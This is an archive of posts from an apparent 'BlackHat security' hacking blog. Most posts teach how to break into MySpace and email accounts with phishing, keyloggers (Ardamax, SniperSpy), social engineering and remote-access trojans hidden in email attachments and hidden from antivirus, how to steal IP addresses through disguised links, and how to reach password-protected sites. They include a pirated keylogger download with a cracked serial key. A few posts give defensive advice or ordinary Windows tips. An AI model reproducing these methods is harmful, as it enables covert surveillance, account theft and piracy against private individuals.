BlackHat security: Internet

Showing posts with label Internet. Show all posts

How to hack myspace private profile/account passwords

The article below explains the most popular ways used to hack myspace account passwords. I came across many myspace password hacking ways- some working …some not. So, i thought of collecting all these working myspace methods/ways of hacking myspace account password in this myspace article.

I will cover 4 methods over here:
1. Myspace Phishing.
2. Keylogging
3. Social engineering
4. Hacker virus at myspace.

So, lets start…

Hack Myspace Account password

1. Myspace Phishing:

I have taken this myspace hacking method first because i think this is the most popular method/way to hack myspace private account. I studied various surveys taken on web about hacking myspace. The results of these surveys show “Phishing” as the most used method to hack myspace and to note…”Phishing is favorite method of hackers”. So, friends.. beware of Phishing. Myspace staff is working hard to avoid these phishers. Phishing not only allows you to hack myspace but also almost any email account. You have to only get the trick used to make a phisher, which i think is very easy. I learnt it without any difficulty. But, remember, this is only for educational purpose. I will not extend this topic over here as i have added more on Phishing in my article Hack Myspace account password by Myspace Phisher

2.Keylogging:

This is my second favorite, as only thing you have to do is remotely install a keylogger (if you don't have any physical access to victim computer). Keylogging becomes more easy if you have physical access to victim computer as only thing you have to do is install a keylogger and direct it to your destination so that it will send all recorded myspace account passwords to pointed destination. What a keylogger does is it records the keystrokes into a log file and then you can use this log to get required myspace password and thus can hack myspace account. You can use Ardamax keylogger or Winspy Keylogger to hack myspace account password.

3. Social engineering:

This sounds to be pretty not working at beginning. Even i was neglecting this way. But, once, i thought of using it against my friend on orkut and i got his gmail password very easily by this method. I think many of you might be knowing how what this social engg is. For newbies, social engg is method of retrieving password or answer of security question simply by quering with the victim. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.

4. Hacker virus:

I was not knowing about this method used by myspace hackers at myspace until i read this article. I wasn't knowing that myspace viruses are being circulated over myspace and was considering myspace as safe. But to my surprise, i was wrong. So, friends, be cautious while surfing myspace.

So far, i found these myspace hacking methods as best and working ways to hack myspace account passwords. I never encourage hacking myspace or any email account…just wanna make you cognizant about myspace dangers online. I will appreciate your effort if you mention any other method you found great….

Open It

How to Protect an Email Account from Spam / Spammers

8 comments

Most of us get SPAM every day. Some of us get more and some little. Even a newly created email account will begin to receive spam just after a few days of it’s creation. Many times we wonder where these spam come from and why? But this question remains unanswered within ourselves. So in this post I will try my best to give every possible information about the spam and will also tell you about how to combat spam.

What is SPAM?

Spam is the abuse of electronic messaging systems (including most broadcast media, digital delivery systems) to send unsolicited bulk messages indiscriminately. Most widely recognized form of spam is email spam.

Where do these SPAM come from?

These spam come only from spammers and never from a legitimate user or a company. These spammers send a single email to hundreds (some times thousands or millions) of email addresses at a time. They either send it manually or use spambots to automate the process of spamming.

Why do spammers SPAM?

The main goal of spammers is to send the spam (unsolicited bulk messages) to as many people as possible in order to make profit. For example, John builds a small website to sell an ebook which gives information about weight loss. In order to make sales he needs publicity for his website. Instead of spending money on advertising, John decides to create an email which contains information about his site along with it’s link and send this email to say 100 email addresses in his contact list. If 1 person out of hundred buy this book john gets $10. What if he sends this email to 1000s of email addresses. He gets $100. Imagine, if he sends this email to 1 Million email addresses he gets $100000.

Now I hope you understood the idea behind spamming. So in order to make money, spammers send their advertising emails to as many people as possible without respecting the recipient’s privacy.

From where do SPAMmers get my email address?

On the Internet there exists many sites who collect the email IDs of people and sell them to spammers in bulk. Most often, people sign up for monthly newsletters and take up surveys. This is the time where these scam sites get their email addresses. Also many spammers collect email addresses by using spambots. These spambots collect email addresses from the Internet in order to build mailing lists. Such spambots are web crawlers that can gather email addresses from Web sites, newsgroups, forums, special-interest group (SIG) postings, and chat-room conversations.

Spammers also use the trick of creating Hoax Email for gathering a huge list of email IDs. For example, a spammer sends a hoax email which says “Forward this Message to Help Severely Burned Child”. This email claims that 11 cents will be donated to the child’s family every time the message is sent to others. Most of the people believe this and start forwarding this hoax email to all of the IDs in their contact list. In this way the email spreads rapidly and eventually when it reaches the creator (spammer), the spammer gets a huge list of valid email addresses in the email header. When you get these kind of hoax emails, you can see for yourself in the email header which contains a huge list of email addresses of all those people to whom the email is being forwarded to. This is one of the effective methods used by spammers to gather email addresses.

Is SPAMming legal?

Spamming is completely illegal. Yet it is really difficult to stop spammers from spamming since they keep moving from one hosting company to another after getting banned. This makes it practically impossible to catch spammers and prosecute them.

How to protect my email account from getting SPAMmed?

The following methods can be used to combat email spam.

1. Use spam filters for your email account. If you’re using email services like Gmail, Yahoo, Hotmail etc. then spam filters are used by defaut. Each spam filter has it’s algorithm to detect spam emails and will automatically move them to SPAM folder. This keeps your inbox free from spam. However some spam emails become successful to make their way into the inbox by successfully bypassing the filters.

2. Do not post your email address in public forums, user comments and chat-rooms. Give your email address only to trustworthy websites while signing up for newsletters.

3. While taking up online surveys and filling up feedback forms, it is better not to give your personal email address. Instead singup for a dummy email account and use this for surveys and feedback forms.

4. While posting your contact email address on your website use this format:emailaddress [at] yoursite.com instead of emailaddress@yoursite.com. This protects your email address from being indexed by spambots.

5. Do not respond to hoax messages. When you receive a hoax email, avoid forwarding it to your friends. Examples of hoax messages can be found at www.hoax-slayer.com. If you really want to forward it to your friends, make sure that you use “Bcc” (blind certified copy) option to send the email. This will hide all the email IDs to which the mail is forwarded to.

IF YOU LIKE MY POST THEN COMMENT !

CREDIT Goes to Srikanth(Original Poster)

Open It

How to Protect an Email Account from being hacked

5 comments

In this post I’ll teach you how to protect your email account from being hacked. Nowadays I get a lot of emails where most of the people say “My Email account is hacked please help…”. Now one question which arises in our mind is:”Is it so easy to hack an email account? OR Is it so difficult to protect an email account from being hacked?”. The single answer to these two questions is “Absolutely NOT!”. It is neither easy to hack an email nor difficult to protect an email account from being hacked.

If this is the case, then what is the reason for many people to loose their accounts?
The answer is very simple. They don’t know how to protect themselves from being hacked! In fact most of the people who loose their email accounts are not the victims of hacking but the victims of Trapping. They loose their passwords not because they are hacked by some expert hackers but they are fooled to such an extent that they themselves give away their password.

Are you confused? If so continue reading and you’ll come to know…

Now I’ll mention some of the most commonly used online scams which fool people and make them loose their passwords. I’ll also mention how to protect your email account from these scams.

1. WEBSITE SPOOFING

Website spoofing is the act of creating a website, with the intention of misleading the readers. The website will be created by a different person or organisation (Other than the original)especially for the purposes of cheating. Normally, the website will adopt the design of the target website and sometimes has a similar URL.

For example a Spoofed Website of Yahoo.com appears exactly same as Yahoo Website. So most of the people believe that it is the original site and loose their passwords. The main intention of spoofed websites is to fool users and take away their passwords. For this,the spoofed sites offer fake login pages. These fake login pages resemble the original login pages of sites like Yahoo,Gmail,Orkut etc. Since it resemble’s the original login page people beleive that it is true and give away their username and passwords by trying to login to their accounts.

Solution:

Never try to login/access your email account from the sites other than the original site.
Always type the URL of the site in the address bar to get into the site.Never click on the hyperlink to enter the site.

2. BY USING KEYLOGGERS

The other commonly used method to steal password is by using a Keylogger. A Keylogger is nothing but a spyware. The detailed description of keylogger and it’s usage is discussed in the post Hacking an email account. If you read this post you’ll come to know that it is too easy to steal the password using a keylogger program. If you just access your email account from a computer installed with keylogger, you definitely loose your password. This is because the keylogger records each and every keystroke that you type.

Solution:
Protecting yourselves from a keylogger scam is very easy.Just install a good anti-spyware program and update it regularly. This keeps your PC secure from a keylogger. Also there is a program called Anti-keylogger which is specially designed to detect and remove keyloggers. You can use this program to detect some stealth keyloggers which remain undetected by many anti-spyware programs.

3. ACCESSING YOUR EMAIL ACCOUNT FROM CYBER CAFES

Do you access your email from cyber cafes? Then definitely you are under the risk of loosing your password.In fact many people loose their email account in cyber cafes. For the owner of the cyber cafe it’s just a cakewalk to steal your password. For this he just need’s to install a keylogger on his computers. So when you login to your email account from this PC, you give away your password to the cafe owner. Also there are many Remote Administration Tools (RATs) which can be used to monitor your browsing activities in real time.

This doesn’t mean that you should never use cyber cafes for browsing the internet. I know, not all the cyber cafe owners will be so wicked but it is recommended not to use cafes for accessing confidential information. If it comes to the matter of security never trust anyone, not even your friend. I always use my own PC to login to my accounts to ensure safety.

So with this I conclude my post and assume that I have helped my readers to protect their email accounts from being hacked. Please pass your comments…

Open It

How to Hack a MySpace Account

18 comments

MySpace is one of the most widely used Social Networking website by many teenagers and adults acropss the globe. I have seen many cheaters create secret Myspace accounts in order to exchange messages with another person and have secret relationships. So, it’s no wonder many people want to know how to hack a Myspace account. In this post I’ll give you the real and working ways to hack a Myspace.

THINGS YOU SHOULD KNOW BEFORE PROCEEDING

With my experience of about 6 years in the field of Hacking and IT security, I can tell you that there are only TWO ways to hack a Myspace: They are Keylogging and Phishing. All the other ways are scams! Here is a list of facts about Myspace hacking.

1. There is no ready made software or program that can hack Myspace just by entering the target username or URL. If you come accross a site that claims to sell a program to hack Myspace then it’s 100% scam.

2. Never trust any Hacking Service that claims to hack a Myspace account just for $100 or $200. All the them are scams.

The following are the only 2 foolproof methods to hack Myspace.

1. HOW TO HACK MYSPACE – The Easiest Way

The easiest way to hack Myspace is by using a keylogger (Spy Software). It doesn’t matter whether or not you have physical access to the target computer. Hacking Myspace becomes just a cakewalk if you use a keylogger since it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers.

1. What is a keylogger?

A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. A keylogger is also called as a Spy software or Spy program.

2. Where is keylogger program available?

There exists tons of keyloggers on the internet, but most of them are useless and doesn’t turn out to be effective. But with my experience I recommend the following keylogger as the best to hack Myspce since it supports remote installation.

1. HOW TO HACK MYSPACE – The Easiest Way

1. What is a keylogger?

A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. A keylogger is also called as a Spy software or Spy program.

2. Where is keylogger program available?

http://www.sniperspy.com/

3. How to install a keylogger?

Keyloggers can be installed just like any other program. At the installation time, you need to set your secret password and hotkey combination, to unhide the keylogger program whenever it is needed. This is because, after installation the keylogger becomes completely invisible and start running in the background. Because of it’s stealth behaviour the victim can never come to know about that the presence of the keylogger software on his/her computer.

4. I don’t have physical access to the target computer, can I still use Sniperspy?

It doesn’t matter whether or not you have physical access to the victim’s computer.
Because SniperSpy offers Remote Installation Feature. So, you can hack Myspace remotely installing the keylogger on the target PC.

You can attach the keylogger with any file such as image, MS excel file or other programs and send it to the victim via email. When the victim runs the file, it will automatically get installed without his knowledge and start recording every activity on his computer. The logs containing these activities are sent to you by the keylogger software via email or FTP.

5. What if the target user (victim) refuses to run the attached file?

Sometimes the victim may refuse to run the attachment that you send via email because of suspicion.

6. How can a keylogger hack Myspace account?

You can hack Myspace using keylogger as follows: You install the keylogger on a Remote PC (or on your local PC). The victim is unaware of the presence of the keylogger on his computer. As usual, he logs into his Myspace account by typing the Myspace username and password. These details are recorded and sent to your Sniperspy account. You can login to your Sniperspy account to see the password. Now you have successfully hacked the Myspace account.

In case if you install the keylogger on your local PC, you can obtain the recorded Myspace password just by unhiding the keylogger program.

7. Why SniperSpy is the best?

I have given a complete review of SniperSpy in my new post Which Spy Software to Choose. This should answer your question.

So what are you waiting for? Go grab it.

For a complete installation guide and more information on SniperSpy visit the following link:
http://www.sniperspy.com/

2. HOW TO HACK MYSPACE – Other Ways

Phishing

Phising is the most commonly used method to hack MySpace. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites like Yahoo, Gmail, MySpace etc. The victim is fooled to believe the fake Myspace page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her Myspace login details are stolen away.
Phishing is proved to be the most effective way to hack Myspace and also has high success rate. The reason for this is quite simple. The users are not aware of the phishing attack. Also the users are fooled, since the fake login pages imitate the appearance of the original pages. So, you may use the phishing technique to hack your friend’s MySpace account (just for fun). But you must have a detailed technical knowledge of HTML and server side scripting languages (php, perl etc.) to create a fake login page.

Open It

How to Copy Locked Photos from Orkut

0 comments

Recently Orkut updated it’s security feature and disabled Right-click on photos of friend’s album. So this makes it difficult to copy photos from Orkut. It’s a new security update made by Orkut to prevent people from copying photos from Orkut and misusing it. This may be annoying most of you! Then…

How To Copy Locked Photos From Orkut?

Yes it’s still possible to copy the photos from Orkut.Here’s a step-by-step procedure to copy the photo.

1. Login into your Orkut Account.

2. Goto your friend’s album and open the photo that you need to copy.

3. Once the photo is loaded to it’s full size just place the mouse cursor on the photo.

4. Press the left click button and drag and drop the photo onto the ADDRESS BAR. I think this trick is no longer working. So I have a new trick….

Just DRAG and DROP the PHOTO onto the current/new TAB (If you have IE 7). Alternatively you can also Drag and Drop the photo onto the Desktop. That’s it. This trick is working now!!

4. Now the photo gets displayed seperately on your browser.

5. You can Right-Click and select the Save As option to save the photo onto your PC.

The browser also displays the direct link to the photo. This link can be used to share the Orkut photos with your friends without the need to login to your Orkut account to access photos.

Please express your opinions through comments. Cheer Up..

Open It

Software to Hack computer remotely : RAT (Remote Access Trojan)

1 comments

Hello friends. I am back with complete new hacking topic - hacking computer remotely. In this article on remote computer hacking, I will inform you about hacking software to hack computer remotely. This software is called "Prorat" is a RAT (Remote administration Tool) used to hack computer remotely.

RATs :

RATs also called as Remote Administration tools are popularly used softwares to control other computer remotely and considering hacking aspects, hack computer remotely. There are many RATs such as:
Prorat
Turkojan
Yuri RAT and many other.

Working of RATs:

To hack computer remotely using a RAT, you have to create a server and then send this server to victim whose you wanna hack computer remotely. Generally, this server is binded to any file say picture or song, so that whenever victim opens this file on his computer, our server is installed and this server opens port of victim computer and by using this opened port, you are able to hack computer remotely.

It is this RAT server that then sends all system information to PRORAT and we can then hack computer remotely using PRORAT.

Things you can do by hacking computer remotely:

Once you gain access to remote computer, you can hack computer remotely and perform any of following:

# Install a keylogger
# Monitor Chat windows
# Shutdown computer remotely
# Take control of system registry
# Hack locally stored passwords and licence keys
# Download additional malware and servers to gain stronger control
# Control and access all Control Panel options(including add or remover programs)
# Send various Error messages
# Access Printer services
# Erase all disk data by formatting drives
# Open FTP connection and start file transaction

Thus, you are able to hack computer remotely 100%. This software to hack computer remotely is hence very popular.

Disadvantage of remote hacking software RAT:

The main disadvantage of this software - RAT is that the server created to hack computer remotely is recognized by most antiviruses as hacktool and hence, antiviruses send alert messages when installing RAT server.
But, there are many softwares like Binders or Crypters to hide RAT server and prevent antiviruses from sending alerts. Even there are softwares like AVkiller which is used to turn antivirus inactive and then our server (used to hack computer remotely) can be installed on victim computer very easily.

This is all about RATs - softwares to hack computer remotely. In my next article, i will inform about server creation and installation on remote computer. If you have any problem with this article on how to hack computer remotely, please mention it in comments section.

Open It

How to find IP address of computer : IP Finder

1 comments

IP Finder service is provided by Syntaxmaster.info to find IP Address. This IP Finder is best solution to find IP Address. Just follow the steps:
1. Register at Syntaxmaster site to find IP address.

http://www.syntaxmaster.info/

2. Now, after registration, login to your account select "Software/Tools".

3. Select "IP Stealer" and move on to next screen.

4. You will be given a url with URL Redirection option. This URL Redirection option can be used to redirect the victim to required site to avoid any doubt of our intention to find IP Address.

What you have to do??

Simply send this URL to victim and whenever he clicks on this link, his IP Address will be recorded at IP Finder helping you to find IP Address.

eg: You can use redirection url as some link for software download and send this IP Finder link to victim so that whenever he clicks on link, you are able to find IP Address.

So guys, I hope you have now well approached with this IP Finder method on how to find IP address. IP finder service is best method to find IP Address. If you find IP Finder difficult to find IP Address, mention it in comments.

Enjoy IP Finder to find IP Address...

Open It

Hack account password with Ardamax keylogger- a powerful spy software...

1 comments

Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file.This log file then can be used to hack anyones email account password or any computer password. The log file can be viewed with the powerful Log Viewer. Ardamax keylogger is easy to use and install. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access or one can use this tool to hack someones hotmail, gmail, yahoo, msn or other email account password. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.

This invisible spy application is designed for Windows 98, ME, NT4, 2000, XP and 2003.

Keylogger Features:

* Remote Installer - creates a customized Ardamax Keylogger engine file. You can email this file to your target for remote monitoring.

* Invisible mode makes it absolutely invisible to anyone. Ardamax Keylogger is not visible in the task bar, system tray, Windows 98/2000/XP/2003/Vista Task Manager, process viewers (Process Explorer, WinTasks etc.), Start Menu and Windows Startup list.

* Email log delivery - keylogger can send you recorded logs through e-mail delivery at set times - perfect for remote monitoring!

* FTP delivery - Ardamax Keylogger can upload recorded logs through FTP delivery.

* Network delivery - sends recorded logs through via LAN.

* Clipboard logging - capture all text copied to the Windows Clipboard.

* Visual surveillance - periodically makes screenshots and stores the compressed images to log.

* Chat monitoring - Ardamax Keylogger is designed to record and monitor both sides of a conversation in following chats:
o MSN Messenger, Windows Live Messenger
o ICQ Pro, ICQ Lite
o Skype
o Windows Messenger
o Google Talk
o Yahoo Messenger
o Miranda
o QiP

* Security- allows you to protect program settings, Hidden Mode and Log file.

* Web Update - Ardamax Keylogger can check the availability of updates, download and install them automatically. Thus, the latest version of Ardamax Keylogger will always be installed on your computer.

* Application monitoring - keylogger will record the application that was in use that received the keystroke!

* Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke!

* Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer.

* Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher.

* Ardamax Keylogger fully supports Unicode characters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets.

* It records every keystroke. Captures passwords and all other invisible text.

Other Features:

* Windows 2000/XP/Vista support
* Monitors multi-user machines
* Automatic startup
* Friendly interface
* Easy to install

Download:
http://rapidshare.com/files/47779604/Setup.rar
[Note, This is the Setup.exe from their site...I just found a working Name/Key so you can have the full version]

Name: nGen 2oo6
Key: RTHUUGQVAWDFOQT

Open It

Hacking Password Protected Websites

2 comments

Warning : For educational purpose only

i know dis is lame but just would like to share wid u.
have nothing for next half an hour so typing it.. lol

here are many ways to defeat java-script protected websites. Some are very simplistic, such as hitting
[ctl-alt-del ]when the password box is displayed, to simply turning offjava capability, which will dump you into the default page.You can try manually searching for other directories, by typing the directory name into the url address box of your browser, ie: you want access to www.target.com .

Try typing www.target.com/images .(almost ever y web site has an images directory) This will put you into the images directory,and give you a text list of all the images located there. Often, the title of an image will give you a clue to the name of another directory. ie: in www.target.com/images, there is a .gif named gamestitle.gif . There is a good chance then, that there is a ‘games’ directory on the site,so you would then type in www.target.com/games, and if it isa valid directory, you again get a text listing of all the files available there.

For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of an entire web site, showing all director ies,or even mirror a complete server. They are indispensable for locating hidden files and directories.What do you do if you can’t get past an opening “PasswordRequired” box? . First do an WHOIS Lookup for the site. In our example, www.target.com . We find it’s hosted by www.host.com at 100.100.100. 1.

We then go to 100.100.100.1, and then launch Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K. (not many HTML pages are bigger than this) This speeds things up some, and keeps you from getting a lot of files and images you don’t care about. This can take a long time, so consider running it right before bed time. Once you have an image of the entire server, you look through the directories listed, and find /target. When we open that directory, we find its contents, and all of its sub-directories listed. Let’s say we find /target/games/zip/zipindex.html . This would be the index page that would be displayed had you gone through the password procedure, and allowed it to redirect you here.By simply typing in the url www.target.com/games/zip/zipindex.html you will be onthe index page and ready to follow the links for downloading.

Open It

Changing your MAC/IP on Windows XP

1 comments

There are two ways two change your IP on Windows. The easy way, and the hard way. Ill discuss how to do both of them in this tutorial.
Easy Way:

The first way to change it is, if your NIC (Network Interface Card) supports cloning your MAC Address. If this is the case then you go to.

Start > Control Panel > Network Connections

Right Click on your NIC card and goto properties. Then click the button labeled Configure. It should bring up another form. Click on the advanced tab. You should see under Property “Locally Administered Address” or “Network Address”. Click the radio button next to the text box, and type in your new MAC address. (note you do not use the “-” when you enter your no MAC Address.

To check and see if it worked or not go to

Start > Run > and type in “cmd”

When the terminal comes up issue the command.

ipconfig /all
———————————————————————————————————————————————–

Hard Way:

To change your MAC Address the hard way, you first go to

Start > Run > and type in “cmd”

Once the terminal comes up type in

“net config rdr”

It should bring up alot of things, but what you are worried about is

NetBT_Tcpip_{ The Numbers Between here}

Copy the numbers in between there and write it down somewhere, seeing that you will need them later.

After you are done with that go to

Start > Run > and type in “regedt32″

That should bring up the windows registry. Once the registry is up go to

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlClass{4D36E972-E325-11CE-BFC1-08002BE10318}

Click on the drop down menu and you should see the sub-categories

0000
0001
0002
and so on.

Click on each one and compare the “NetCfgInstanceId” Key with the number you wrote down earlier. Once you find a match double click on the key “NetworkAddress” and change the value to your new MAC address. Hit ok and reboot your system.

There r several ways u can determine ur IP address information:

IPCONFIG

Start / Run / cmd
IPCONFIG /ALL
This opens a command window. One advantage is that u can send the information to a text file (IPCONFIG /ALL > c:ip.txt)
But sometimes the window shows show much information u need to scroll around to fine it.

VIEW STATUS

Control Panel / Network Connections / Double click the icons 4 ur network (If the network has an icon in the system tray u can also just double click on that icon)
Click on the Support tab
Click on the Details button
:::::::::::::
Make Pictures Smaller Unavailable

When u try nd send pictures through e-mail, u should normally be given the option to make them smaller.
If this option is not available, a DLL file may need to be registered.

Start
Run
regsvr32 shimgvw.dll
:::::::::::::
Creating a Suspend Shortcut

If u would like to create an icon to suspend ur computer,

Right click on the Desktop
New / Shortcut
Enter in rundll32.exe PowrProf.dll, SetSuspendState
Give it whatever name u want
Now when u click on that shortcut, ur computer will shutdown nd suspend
Submitted by Gabe
:::::::::::::
Changing the User Type

Normally in XP Pro, through the Control Panel / User Accounts icon, u r only allowed to create administrators or limited users.
If u want to create

Right click on My Computer
Manage
Local Users nd Groups
Users
Right click on the user u want to change
Properties
Member of tab
Add button
Advanced button
Find Now button
From here u see the full list of possibilities (e.g. Power User, Backup Operator etc.)
:::::::::::::

some more
Determining Which Services r Associated with SVCHOST

Since so many critical services r run with each svchost,
You can see which ones r being used by opening a cmd prompt nd running:

tasklist /svc /fi “imagename eq svchost.exe”

Note: This is available only with XP Pro
:::::::::::::
Identify Faulty Device Drivers

If u r having problems with lockups, blue screens, or can only get to safe mode,
often the problem is due to a faulty device driver.

One way to help identify them is through the use of the Verfier program

Start / Run / Verifier
Keep the default of Create Standard Settings
Select the type of drivers u want to confirm
A list of drivers to be verified on the next boot will be shown.
Reboot
If ur computer stops with a blue screen, u should get an error message with the problem driver
To turn off the Verifier, run verifier /reset
:::::::::::::
Viewing Installed Drivers

If u want to see a list of installed drivers, u can run the driverquery program
There r a lot of available switches to view different types of information.
On use can be to export to a CSV file 4 viewing in Excel
An example would then be:

Driverquery /v /fo csv > drivers.csv
Hope you Get this !!!
surely comment here m waiting for comments ....

Open It

IP Address Hacking

1 comments

In here I have figure out some very easy but cool ways to trace out the geographical location and various other infos like ISP details etc of a remote computer using its IP.

Well I guess its one of the most important must learn manual for boys out there if you want to impress your friends particularly gals whom you’ll meet online in a chat room and tell them their geographical locations and ISP details and make them surprised and impressed .

In the practical execution of this manual you don’t have to work much as it is very simple only you have to use your brain to understand some symbols and some format of expressions and use your IQ to execute things the right way.

What is IP and how to get the IP of a remote system::

Getting the IP or Internet Protocol of a remote system is the most important and the first step of hacking into it. Probably it is the first thing a hacker do to get info for researching on a system. Well IP is a unique number assigned to each computer on a network. It is this unique address which represents the system on the network. Generally the IP of a particular system changes each time you log on to the network by dialing to your ISP and it is assigned to you by your ISP. IP of a system which is always on the network remains generally the same. Generally those kind of systems are most likely to suffer a hacking attack because of its stable IP. Using IP you can even execute system commands on the victim’s computer.

Lets take the example of the following IP address: 202.144.49.110 Now the first part, the numbers before the first decimal i.e. 209 is the Network number or the Network Prefix.. This means that it identifies the number of the network in which the host is. The second part i.e. 144 is the Host Number that is it identifies the number of the host within the Network. This means that in the same Network, the network number is same. In order to provide flexibility in the size of the Network, here are different classes of IP addresses:

Address Class Dotted Decimal Notation Ranges

Class A ( /8 Prefixes) 1.xxx.xxx.xxx through 126.xxx.xxx.xxx

Class B ( /16 Prefixes) 128.0.xxx.xxx through 191.255.xxx.xxx

Class C ( /24 Prefixes) 192.0.0.xxx through 223.255.255.xxx

The various classes will be clearer after reading the next few lines.

Each Class A Network Address contains a 8 bit Network Prefix followed by a 24-bit host number. They are considered to be primitive. They are referred to as “/8′’s” or just “8’s” as they have an 8-bit Network prefix.

In a Class B Network Address there is a 16 bit Network Prefix followed by a 16-bit Host number. It is referred to as “16’s”.

A class C Network address contains a 24-bit Network Prefix and a 8 bit Host number. It is referred to as

“24’s” and is commonly used by most ISP’s.

Due to the growing size of the Internet the Network Administrators faced many problems. The Internet routing tables were beginning to grow and now the administrators had to request another network number from the Internet before a new network could be installed at their site. This is where sub-netting came in.

Now if your ISP is a big one and if it provides you with dynamic IP addresses then you will most probably see that whenever you log on to the net, your IP address will have the same first 24 bits and only the last 8 bits will keep changing. This is due to the fact that when sub-netting comes in then the IP Addresses structure becomes:

xxx.xxx.zzz.yyy

where the first 2 parts are Network Prefix numbers and the zzz is the Subnet number and the yyy is the host number. So you are always connected to the same Subnet within the same Network. As a result the first 3 parts will remain the same and only the last part i.e. yyy is variable.

***********************

For Example, if say an ISP xyz is given the IP: 203.98.12.xx Network address then you can be awarded any IP, whose first three fields are 203.98.12. Get it?

So, basically this means that each ISP has a particular range in which to allocate all its subscribers. Or in other words, all subscribers or all people connected to the internet using the same ISP, will have to be in this range. This in effect would mean that all people using the same ISP are likely to have the same first three fields of their IP Addresses.

This means that if you have done a lot of (By this I really mean a lot) of research, then you could figure out which ISP a person is using by simply looking at his IP. The ISP name could then be used to figure out the city and the country of the person. Right? Let me take an example to stress as to how cumbersome but easy (once the research is done) the above method can be.

In my country, say there are three main ISP’s:

ISP Name Network Address Allotted

ISP I 203.94.47.xx

ISP II 202.92.12.xx

ISP III 203.91.35.xx

Now, if I get to know the IP of an e-pal of mine, and it reads: 203.91.35.12, then I can pretty easily figure out that he uses ISP III to connect to the internet. Right? You might say that any idiot would be able to do this. Well, yes and no. You see, the above method of finding out the ISP of a person was successful only because we already had the ISP and Network Address Allotted list with us. So, what my point is, that the above method can be successful only after a lot of research and experimentation. And, I do think such research can be helpful sometimes.

Also, this would not work, if you take it all on in larger scale. What if the IP that you have belongs to someone living in a remote igloo in the North Pole? You could not possibly get the Network Addresses of all the ISP’s in the world, could you? If yes please send it to me J.

Well now I guess you have pretty good knowledge about what an IP is and what you can do by knowing the IP of a remote system. Now lets come to the point of finding out the IP of remote system.

Well you can easily figure out the IP of a remote system using the netstat utility available in the microsoft’s version of DOS. The netstat command shows the connections in which your system is engaged to and the ports they are using. Suppose you are checking your mail in hotmail and you want to find out the IP of msn. All you need to do is to open a dos window (command.com) and type netstat. You will see all the open connections of your system. There you will see something :

Proto Local Address Foreign Address State

TCP abhisek:1031 64.4.xx.xx:80 ESTABLISHED

Now you got the IP address of hotmail ass 64.4.xx.xx .

Similarly you can figure out the IP address of most http or ftp connections.

To know your own IP type the following command in a dos windows

C:netstat –n

[this commands converts the IP name into IP addresses]

this is what you will probably see on typing the above command :

Proto Local Address Foreign Address State

TCP 203.xx.251.161:1031 194.1.129.227:21 ESTABLISHED

TCP 203.xx.251.161:1043 207.138.41.181:80 FIN_WAIT_2

TCP 203.xx.251.161:1053 203.94.243.71:110 TIME_WAIT

TCP 203.xx.251.161:1058 194.1.129.227:20 TIME_WAIT

TCP 203.xx.251.161:1069 203.94.243.71:110 TIME_WAIT

TCP 203.xx.251.161:1071 194.98.93.244:80 ESTABLISHED

TCP 203.xx.251.161:1078 203.94.243.71:110 TIME_WAIT

Here 203.xx.251.161 is your IP address.

Now lets clarify the format used by netstat :

Proto : It shows the type of protocol the connection with the remote system is using.

Here TCP (transmission control protocol) is the protocol used by my system to connect to other systems.

Local Address : It shows the local address ie the local IP. When the netstat command is executed without –n switch then the name of the local system is displayed and when the netstat is executed with –n switch then the IP of the local system is displayed. Here you can also find out the port used by the connection.

xxx.yyy.zzz.aaa:1024

in this format you will see the local address. Here 1024 is the port to which the remote system is connected in your system

Foreign Address :: It shows the IP address of the remote system to which your system is connected. In this case also if the netstat command is excuted with –n switch then you directly get the IP of the victim but if the netstat is executed without –n switch then you will get the address of the remote system. Something like

C:netstat

Proto Local Address Foreign Address State

TCP abhisek:1031 msgr.lw4.gs681.hotmail.com:80 ESTABLISHED

Here msgr.lw4.gs681.hotmail.com is the address of the foreign system . putting this address in any IP lookup program and doing a whois lookup will reveal the IP of the remote system.

Note: The port to which your system is connected can be found from this in the same way as I have shown in the case of local address. The difference is that, this is the port of the remote system to which your computer is connected to.

Below I have produced a list of ports and popular services generally found to be running.

21 :: FTP port

80 :: http port

23 :: Telnet port

Note: If your execute the netstat command and find ports like 12345,27374 are open and are in use then make it sure that your sweat heart computer is infected with her boyfriend.. J J J J I mean your computer is infected with some sort of Trojan.

Below I have produced a list of commonly known Trojans and the ports they use by default. So if you find these ports open then get a good virus buster and get these stupid servers of the Trojans kicked out. Well if you want to play with these Trojan by keeping them in your computer but not letting them ruin your system performance then just disble it from the system registry run and they wont be loaded to memory each time when windows starts up[This trick doesn’t work for all Trojans].

Netbus :: 12345(TCP)

Subseven :: 27374(TCP)

Girl Friend :: 21554(TCP)

Back Oriface :: 31337 (UDP)

Well guys and gals I hope you are now well familiar with the term IP and what is the utility of IP in cyber world and how to get the IP of a remote system to which you are connected. I hope you find my writings very easy to undertstand. I know I lack the capacity of explaining myself but I try my level best to make things very easy and clear for you’ll.

How to get the IP of a remote system while chatting through msn messenger ::

This is a tutorial on how to get IP address from MSN messenger. This is actually
a really easy thing to do. It is not like going through the hard time and reversing
MSN messenger like many people think.

The IP address is only given when you accept or are sending a file through MSN
messenger. When you send IM’s, the message is sent through the server thus hiding
your victims IP and your. But when you send a file or recieve a file, it is direct
connection between the two computers.

To obtain the IP accept a file transfer or send a file to the victim, when the file
sending is under way from the dos prompt type “netstat” without the quotation marks.
You should get a table like this:

Proto Local Address Foreign Address State
